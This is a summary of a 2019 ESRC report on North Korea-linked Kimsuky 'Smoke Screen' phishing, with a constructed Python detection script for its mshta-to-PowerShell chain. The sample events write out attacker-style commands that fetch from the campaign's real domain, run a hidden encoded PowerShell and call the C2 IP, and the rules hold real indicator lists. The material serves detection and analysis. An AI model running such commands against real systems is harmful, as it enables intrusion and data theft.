Encrypted APT attack, Kimsuky organization's 'Smoke Screen' PART 2

2019-05-13, ESTSecurity (ESRC)

https://blog.alyac.co.kr/2299


ESRC reports that the Kimsuky-linked campaign 'Smoke Screen' continued into May 2019, targeting South Korean and U.S. professionals working on North Korea-related issues. One observed DOC lure impersonated a U.S. think-tank researcher, carried Korean-language document artifacts and the 'windowsmb' account name, and invoked mshta.exe against paths on bit-albania.com that decoded into HTA/VBScript and PowerShell stages. The server side exposed several remote-command and payload paths, including expres.php, upload.php, cow.gif and exe.gif, along with PowerShell modules for directory listing, command execution, executable launch, file deletion and keylogging. Decoded payloads included EGIS-signed malware and a Chinese-language PCRat Server.dll that communicated with 173.248.170.149, which places the campaign in the remote-access and information-theft category rather than generic phishing.
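The chain summarised above (Office lure, mshta.exe fetching a remote HTA, a PowerShell stage, C2 traffic to the named infrastructure) is the kind of thing an endpoint detection can key on. The following is an added example written for this summary, not code from ESRC or from the original post: it runs three rules over Sysmon-style process-creation records. The record layout, the assumption that WINWORD.EXE is the parent of mshta.exe, and the sample events (including the exact URLs) are constructed for illustration; only the indicator values (bit-albania.com, 173.248.170.149, expres.php, upload.php, cow.gif, exe.gif) come from the report.

```python
"""Constructed detection example for the Smoke Screen process chain.

Not ESRC's code. Record layout, parent-process names and the sample events
are assumptions; the indicator values are the ones named in the write-up.
"""
import re
from dataclasses import dataclass

# Assumed lure hosts: Office applications that open the DOC decoy.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Indicators named in the ESRC write-up (domain, C2 IP, server-side paths).
IOC_DOMAINS = {"bit-albania.com"}
IOC_IPS = {"173.248.170.149"}
IOC_PATHS = ("/expres.php", "/upload.php", "/cow.gif", "/exe.gif")

URL_RE = re.compile(r'''https?://([A-Za-z0-9.-]+)(/[^\s"']*)?''', re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal Sysmon Event ID 1 shape (assumed layout)."""
    pid: int
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (pid, rule_name) pairs for every rule each event trips."""
    alerts = []
    for ev in events:
        img = _basename(ev.image)
        parent = _basename(ev.parent_image)
        cmd = ev.command_line

        # Rule 1: an Office process spawning mshta.exe with a remote URL argument.
        if img == "mshta.exe" and parent in OFFICE_PARENTS and URL_RE.search(cmd):
            alerts.append((ev.pid, "office_spawns_remote_mshta"))

        # Rule 2: any command line that references the report's domain, IP or
        # server-side paths. endswith() with a leading slash avoids matching
        # unrelated names such as /myupload.php.
        for m in URL_RE.finditer(cmd):
            host = m.group(1).lower()
            path = (m.group(2) or "").lower()
            if host in IOC_DOMAINS or host in IOC_IPS or path.endswith(IOC_PATHS):
                alerts.append((ev.pid, "smoke_screen_ioc"))
                break

        # Rule 3: mshta.exe handing execution to PowerShell (the decoded stage).
        if img == "powershell.exe" and parent == "mshta.exe":
            alerts.append((ev.pid, "mshta_spawns_powershell"))
    return alerts


# Constructed sample telemetry: one lure chain plus two control events.
SAMPLE_EVENTS = [
    ProcessEvent(100, r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 r"C:\Windows\explorer.exe",
                 r'"WINWORD.EXE" /n "C:\Users\user\Downloads\lure.doc"'),
    ProcessEvent(101, r"C:\Windows\System32\mshta.exe",
                 r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 "mshta.exe http://bit-albania.com/cow.gif"),  # constructed URL
    ProcessEvent(102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "powershell.exe -NoP -W Hidden -enc AAAA"),
    ProcessEvent(103, r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\explorer.exe",
                 r"mshta.exe C:\Users\user\app.hta"),  # local HTA: no URL, no IOC
    ProcessEvent(104, r"C:\Windows\System32\curl.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "curl.exe http://173.248.170.149/upload.php"),  # constructed URL
]


def run_sample():
    """Run the rules over the constructed events."""
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, rule in run_sample():
        print(f"pid {pid}: {rule}")
```

Rule 1 fires on the parent/child relationship plus a URL, so it does not depend on the attacker's domain; rules 2 and 3 are the indicator-bound and post-exploitation checks. A local HTA launched from Explorer (event 103) trips nothing, which keeps the noise of legitimate mshta.exe use down.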
